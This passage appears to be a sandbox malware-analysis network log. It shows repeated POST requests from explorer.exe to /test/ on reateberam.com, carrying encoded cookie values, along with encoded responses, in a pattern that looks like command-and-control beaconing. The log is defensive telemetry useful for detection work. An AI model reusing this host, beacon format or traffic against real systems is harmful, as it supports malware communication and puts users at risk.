2024-12-02 17:42:14 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:15 UTC	794	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bffgGmlqe7VJTqLcW%2Bkoet928xI0DSGnwh6RJC3isbBkjY3D%2B4fNwzd7MbDYM2B%2BF%2BQHl196NG5p7nYbJtv5Ye5MAoYUz5sKuiIBzM9cYAFXgy%2Foy2JFZaPOPZ2AcNRMCg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1cc88fec43c7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1596&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=1771844&cwnd=211&unsent_bytes=0&cid=434c9ca673e16d80&ts=748&x=0"
2024-12-02 17:42:15 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 79 71 63 51 73 53 77 30 59 70 76 5a 52 33 63 6a 57 48 69 67 33 39 4c 4d 30 4c 55 41 43 50 43 62 66 6d 77 76 79 62 45 5a 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 49 55 41 6a 65 35 71 4f 68 46 38 67 41 62 75 35 73 4f 30 4c 75 70 57 70 70 4d 34 35 67 69 6c 53 46 57 64 4c 37 38 76 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 63 77 78 41 75 4c 6d 4a 58 4d 51 61 4c 48 46 63 33 49 6c 71 34 39 41 36 31 4c 63 41 42 34 70 69 6b 6b 31 4d 56 30 4a 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 2f 4e 58 52 35 Data Ascii: 150MyqcQsSw0YpvZR3cjWHig39LM0LUACPCbfmwvybEZWmcphSGpB6yiJiVjA1nIUAje5qOhF8gAbu5sO0LupWppM45gilSFWdL78vsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FcwxAuLmJXMQaLHFc3Ilq49A61LcAB4pikk1MV0JcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZN/NXR5
2024-12-02 17:42:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50036	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:17 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:17 UTC	784	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2iIROTfnjVgUj4XNo0s7o9SlmAtWSlDIebs9cwxKtbZNyfdGvH6q5JJomcZhmLYG42KyM8XBP2OCXDk6RBpNSfIwJJ42Qm2FvIWzsZ2H84nPvRdkB3HCRPJQQkVbdQg7lw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1cd6392e8c3c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1928&rtt_var=728&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=1496668&cwnd=218&unsent_bytes=0&cid=16fa0846cdb2cf3f&ts=781&x=0"
2024-12-02 17:42:17 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 79 32 65 51 4d 61 32 33 59 70 6c 59 68 6a 5a 6a 57 4c 6d 67 33 39 4f 4f 55 72 52 42 53 4c 43 62 76 2b 78 75 53 48 4e 62 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 49 6b 49 71 63 35 58 70 37 46 73 67 44 4c 75 36 74 61 42 47 74 35 43 71 72 4d 6f 37 37 55 35 54 48 32 42 4f 37 63 57 6b 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 7a 41 65 33 6e 4b 58 4d 54 62 37 62 47 66 58 67 70 71 34 52 47 35 6c 54 66 43 68 34 70 68 30 77 2b 4d 56 77 49 4f 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 4e 54 54 35 Data Ascii: 150My2eQMa23YplYhjZjWLmg39OOUrRBSLCbv+xuSHNbGmcphSGpB6yiJiVjA1pIkIqc5Xp7FsgDLu6taBGt5CqrMo77U5TH2BO7cWkfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcwzAe3nKXMTb7bGfXgpq4RG5lTfCh4ph0w+MVwIOcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfNTT5
2024-12-02 17:42:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50037	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:19 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:20 UTC	790	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5BWpgyAWZmWWQxtT8AnWVTZifSL7jZtG%2BnuNp%2FednTyf1JPwg5rLj9mu%2FuYcvQ9m4EIIb77Q9rnJREwcNMeEYuzohWexM3KO8DMueLQ0YRYrPUeu6NmVIUqHkSm8QWDJEA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1ce40b3d8c8f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2173&min_rtt=2173&rtt_var=1086&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4208&recv_bytes=1053&delivery_rate=103962&cwnd=204&unsent_bytes=0&cid=c89ea934362d7929&ts=780&x=0"
2024-12-02 17:42:20 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 53 6d 63 51 38 47 36 32 49 70 76 61 78 6e 65 6a 47 37 6b 67 33 39 4b 50 6b 4c 53 44 43 50 43 62 66 71 79 76 79 44 4e 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 39 70 4c 30 38 73 65 5a 75 4f 68 31 59 6d 43 4c 61 36 73 65 30 49 73 70 53 71 72 4d 34 2b 67 69 4a 52 46 57 4e 4d 37 73 76 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 63 6f 78 42 75 72 71 4b 58 4d 58 61 37 54 45 65 6e 63 72 71 34 52 45 35 31 48 64 43 42 41 70 68 6b 77 34 4d 31 73 4d 50 4d 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 56 57 52 70 Data Ascii: 150PSmcQ8G62IpvaxnejG7kg39KPkLSDCPCbfqyvyDNKRib7xuPoA21j4bUiz9pL08seZuOh1YmCLa6se0IspSqrM4+giJRFWNM7svsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EcoxBurqKXMXa7TEencrq4RE51HdCBAphkw4M1sMPMC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfVWRp
2024-12-02 17:42:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50038	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:21 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:22 UTC	794	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tuqoE9dgwDUkUvOJobWGeMhoJP3jfqrTgIrL5fMBxE5paULXsQ8p%2BQX%2F9aIp%2B%2BIAWoQ9kceDrbxXkk7trb6aLdlgx53UlC8YVw8L6r6bPh7h71DqqxCVg711BbQ4o%2BAF7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1cf2682742fc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1607&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1759036&cwnd=187&unsent_bytes=0&cid=f111e0f057780dae&ts=759&x=0"
2024-12-02 17:42:22 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 79 53 64 51 63 4b 30 32 59 70 6c 5a 42 54 52 6a 47 48 6d 67 33 46 49 50 6b 4c 65 41 79 66 43 5a 76 79 79 75 43 50 45 5a 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 49 55 51 6f 66 4a 58 67 37 46 77 6b 44 37 4f 36 75 4b 5a 47 75 35 4b 70 72 4d 30 37 37 6b 35 64 48 47 5a 46 36 63 4b 6c 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 41 34 42 75 76 71 4b 42 31 2b 62 62 48 4a 63 33 67 6c 35 63 74 4f 37 46 50 62 41 42 46 44 37 45 38 37 4d 6c 4d 41 4f 49 76 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 55 52 5a Data Ascii: 150PySdQcK02YplZBTRjGHmg3FIPkLeAyfCZvyyuCPEZWmcphSGpB6yiJiVjA1sIUQofJXg7FwkD7O6uKZGu5KprM077k5dHGZF6cKlfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcA4BuvqKB1+bbHJc3gl5ctO7FPbABFD7E87MlMAOIvMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1URZ
2024-12-02 17:42:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50039	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:24 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:25 UTC	793	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KdaFjtUn%2BSrC5dr20EGf3lYfL6Knzuq8j%2F%2BLUCsOCFuoQ7AAXq3kblJMUkoK70FbTvuk0f14I2RIKg5eMist9uHaXgSQ7dS3nLCQB9r1Kf1A0NcEBionb%2BGl8iXrMfFQQg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1d020b568ccd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2122&min_rtt=2085&rtt_var=808&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1400479&cwnd=195&unsent_bytes=0&cid=a7160fe71789e788&ts=1017&x=0"
2024-12-02 17:42:25 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 79 36 55 54 63 43 30 32 59 70 67 59 78 58 62 68 57 4c 69 67 33 4e 4f 50 6b 6a 57 42 79 48 43 61 50 65 77 75 43 54 4a 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 35 72 49 30 45 72 65 70 61 4f 68 56 77 6b 44 4c 57 2f 74 75 30 4f 74 5a 57 6d 70 4d 35 52 36 43 68 64 46 47 56 45 35 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 46 46 4d 38 35 41 65 2b 4d 4a 52 51 5a 61 37 62 43 63 7a 30 6b 37 6f 42 42 35 6c 66 56 5a 78 35 47 68 30 77 35 4d 6c 6c 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 6b 4f 50 56 53 54 70 Data Ascii: 150Oy6UTcC02YpgYxXbhWLig3NOPkjWByHCaPewuCTJKRib7xuPoA21j4bUiz5rI0ErepaOhVwkDLW/tu0OtZWmpM5R6ChdFGVE54+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzFFM85Ae+MJRQZa7bCcz0k7oBB5lfVZx5Gh0w5MllEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbkOPVSTp
2024-12-02 17:42:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50040	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:26 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:27 UTC	789	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rrX5jZbjzl1UPwziznoNPMGwRmgZyXncYbrXtJIFgOdK7PFzhlwdRpmB8Tk%2Fsh2hSUixrzLOIrdBD0sPW16APqKF9m5AkwvNNU5YI3uPXMRf0N7qRIgEOSWKiT7a2%2BGKKg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1d12b870aab0-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13867&min_rtt=13864&rtt_var=5205&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=210223&cwnd=32&unsent_bytes=0&cid=23602d121f92138d&ts=791&x=0"
2024-12-02 17:42:27 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 79 2b 59 52 4d 61 33 32 6f 70 69 5a 42 37 66 6a 47 54 6a 67 33 4e 50 4d 30 76 56 42 69 50 43 5a 2f 79 78 75 53 2f 4b 59 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 76 4c 30 41 6f 66 70 66 6e 37 46 63 6d 41 62 47 2b 74 4b 4a 47 74 5a 61 6e 6f 73 67 38 37 45 35 52 48 47 42 4a 36 73 57 69 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6f 34 42 4f 37 68 49 52 31 2b 61 4c 44 44 65 48 6b 73 34 73 74 45 36 31 66 66 41 42 35 48 37 45 30 30 4e 56 77 4f 4f 49 6a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 62 52 4a Data Ascii: 150My+YRMa32opiZB7fjGTjg3NPM0vVBiPCZ/yxuS/KY2mcphSGpB6yiJiVjA1vL0Aofpfn7FcmAbG+tKJGtZanosg87E5RHGBJ6sWifW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kco4BO7hIR1+aLDDeHks4stE61ffAB5H7E00NVwOOIjMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1bRJ
2024-12-02 17:42:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50041	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:28 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:29 UTC	788	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2FLcV3QgZZZUAxm78yu0QlPBzojkqFLBZdK3KMO66iKEQhtuBYMWenykDPo8BZXl8%2FwKFWVxHDjCd8xNQD2sJGpyVlps9dj1fPPMJWw4JGrz5YmfkxvlQ8pnRGiWH9LMyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1d206adb185d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1515&rtt_var=673&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1927392&cwnd=236&unsent_bytes=0&cid=411179179505be81&ts=794&x=0"
2024-12-02 17:42:29 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 53 57 59 51 63 65 78 33 6f 70 67 61 78 37 59 68 57 2f 6a 67 33 39 4c 4f 30 4c 54 41 79 6e 43 5a 2f 75 78 76 69 48 4e 62 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 74 4a 45 51 76 65 5a 44 6c 37 46 6b 71 43 37 43 32 75 61 64 47 74 35 75 76 70 4d 38 36 35 55 35 53 48 6d 42 45 37 63 57 70 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 34 30 42 4f 6a 72 4a 42 31 2b 61 62 50 45 65 33 59 6c 35 73 74 42 35 31 50 55 44 52 46 41 37 45 34 36 4e 31 73 4d 50 59 6e 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 57 51 35 Data Ascii: 150PSWYQcex3opgax7YhW/jg39LO0LTAynCZ/uxviHNbWmcphSGpB6yiJiVjA1tJEQveZDl7FkqC7C2uadGt5uvpM865U5SHmBE7cWpfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc40BOjrJB1+abPEe3Yl5stB51PUDRFA7E46N1sMPYnMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1WQ5
2024-12-02 17:42:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50042	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:31 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:31 UTC	797	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XM39WEdS4JKZzd7zIkBiYzdUDe5Z7BCZy%2F6pBGTkxwV%2BsOGS0Ou9ltVWD%2Fbav8Ai7W%2FqxtAi6lwqmJBano4fqIm5YNu9MYfH3e1tV1N%2FFf0bdnIn9P2Dzf2g%2BarrYAWRZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1d2e8b0c6aee-BUF alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=12060&min_rtt=12046&rtt_var=4547&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=240032&cwnd=32&unsent_bytes=0&cid=3269f2bc2a4ae4e3&ts=819&x=0"
2024-12-02 17:42:31 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 79 57 64 52 4d 43 36 32 49 70 6c 5a 68 76 64 6a 47 48 6f 67 33 46 4f 50 30 50 54 42 43 66 43 61 2f 69 32 75 69 66 4c 62 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 4c 30 45 74 65 4a 66 6e 37 46 59 6b 43 72 57 2b 74 61 42 47 74 70 53 70 6f 4d 41 33 67 69 68 51 48 6d 56 45 37 63 54 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 73 67 30 42 75 33 72 49 33 4d 53 5a 62 44 46 66 6e 59 6c 71 34 46 44 36 6c 76 65 44 68 45 70 69 6b 38 30 4e 46 30 49 4e 38 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 39 56 54 35 Data Ascii: 150MyWdRMC62IplZhvdjGHog3FOP0PTBCfCa/i2uifLbGmcphSGpB6yiJiVjA1nL0EteJfn7FYkCrW+taBGtpSpoMA3gihQHmVE7cTsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Gsg0Bu3rI3MSZbDFfnYlq4FD6lveDhEpik80NF0IN8C9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf9VT5
2024-12-02 17:42:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50043	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
